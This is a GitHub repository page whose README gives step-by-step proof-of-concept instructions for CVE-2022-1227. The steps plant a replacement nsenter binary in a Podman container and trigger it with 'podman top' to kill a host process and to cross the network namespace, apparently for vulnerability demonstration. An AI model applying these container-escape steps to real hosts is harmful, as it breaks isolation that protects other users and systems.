Skip to content

iridium-soda/CVE-2022-1227_Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits

exp

exp

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

Repository files navigation

CVE-2022-1227_Exploit

A script for exploiting CVE-2022-1227.

Background

  • Ubuntu 20.10 is recommanded.
  • Podman <4.0.0; 3.4.4 is recommanded.

TODO: add what is the principle of this vulnerability

Install podman

Follow the instruction in the official document: https://podman.io/getting-started/installation#installing-on-linux

For Ubuntu 20.10, the imstall command should be:

sudo apt-get install podman=3.4.4+ds1-1ubuntu1

Quick Start

Simple Exploit

In this section we try a simple PoC to break the bundary of PID namespace and kill a process in the host.

Here are the steps:

  1. Run a container by the following command: podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity

  2. Run keep in ./exp/bin and get the PID it is running. Usually it will display its PID on the terminal. As the binary are set to sleep for 600 seconds, maybe you must be quick to finish the follow steps.

    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
My process ID is: 7719
Put this number to `PID` in the sendsig.c and compile!

  3. Edit the source code in ./exp/src/sendsig.c and fill in the PID obtained in the previous step in variable pid.

    int pid = OLD_VAL;

    to

    int pid = 7719;

  4. Put the compiled binary to the internal podman: podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter

  5. Run podman top to trigger vulnerability by: podman top -l

  6. If everything goes right, the running process keep will be killed immediately. This is unusual, because normally processes inside the container cannot send signal to processes on the host due to the PID namespace isolation.

    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
My process ID is: 7719
Killed

Full exploit

In this section, we use sockets to realize the inter-process socket communication between the client in the container and the server on the host, which is usually impossible when the isolation mechanism is complete. We use this vulnerability to break through the isolation of net namespace to realize this exploit.

First, enter the directory by cd ./exp;

By simply running ./exploit.sh, everything will be done automatically; if everything goes right, the server will display:

Hello from the container!

It means we go across the network namespace and escape.

About

A script for exploiting CVE-2022-1227

Resources

Readme

License

Apache-2.0 license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages